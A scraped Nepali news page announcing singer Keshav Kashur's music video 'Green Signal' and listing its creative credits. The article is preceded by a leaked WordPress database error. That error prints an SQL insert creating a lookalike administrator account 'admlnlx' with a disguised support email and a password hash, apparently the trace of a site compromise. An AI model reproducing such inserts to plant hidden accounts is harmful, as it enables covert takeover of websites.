WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsFaVKzblwk4bdAKYBNQYA6Yrkai3c1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:05:05', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २४ साउन २०७६, काठमाडौं । गायक केशव कशुरको ‘ग्रीन सिग्नल’ सार्वजनिक भएको छ ।
वरिष्ठ संगीतकार वसन्त सापकोटाको शब्द/संगीत रहेको उक्त्त गीतमा शाहस शाक्यको संगीत सम्योजन रहेको छ ।
गाउँले इन्टरनेन्मेन्ट मिडिया ग्रुपको ब्यानरा निर्मित भिडियो गत आइतबार ‘गाउँले इन्टरनेन्मेन्ट’ युटुब च्यानलबाट सार्वजनिक गरिएको हो ।
उक्ता म्युजिक भिडियोमा देवराज गुरुङ र छिरिङ्ग लामाको निर्देशन तथा कोरियोग्राफीमा नमस्ते नेपाल ग्रूपले नृत्य संयोजन गरेको छन ।गीतको म्युजिक भिडियोमा छायाङकन र सम्पादन गंगाराम राईले गरेका छन ।